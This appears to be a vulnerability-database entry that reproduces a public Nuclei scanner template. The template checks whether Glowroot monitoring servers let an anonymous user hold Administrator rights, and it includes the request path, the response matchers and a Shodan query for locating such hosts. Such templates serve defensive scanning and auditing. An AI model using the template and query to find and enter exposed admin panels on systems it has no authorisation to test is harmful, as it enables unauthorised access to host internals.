unauthenticated-glowroot: Glowroot Anonymous User

日期: 2025-08-01 | 影响软件: Glowroot | POC: 已公开

漏洞描述

Anonymous user access allows to understand the host internals

PoC代码[已公开]

id: unauthenticated-glowroot

info:
  name: Glowroot Anonymous User
  author: pussycat0x
  severity: high
  description: Anonymous user access allows to understand the host internals
  metadata:
    max-request: 1
    shodan-query: http.title:"Glowroot"
  tags: misconfig,unauth,glowroot,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/backend/admin/users?username=anonymous'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"username":"anonymous"'
          - '"Administrator"'
          - '"newPassword":""'
        condition: and

      - type: word
        words:
          - "application/json"
        part: header

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b302f21e2fc3a94edb49d5f64563e8cc1409185b0de8f333809376fb006e697c022100b45d7d39c05ec2fbcef0daa2bb4cd9e2b01f6d4cd9930b973147231ef5f603a9:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/misconfiguration/unauthenticated-glowroot.yaml

相关漏洞推荐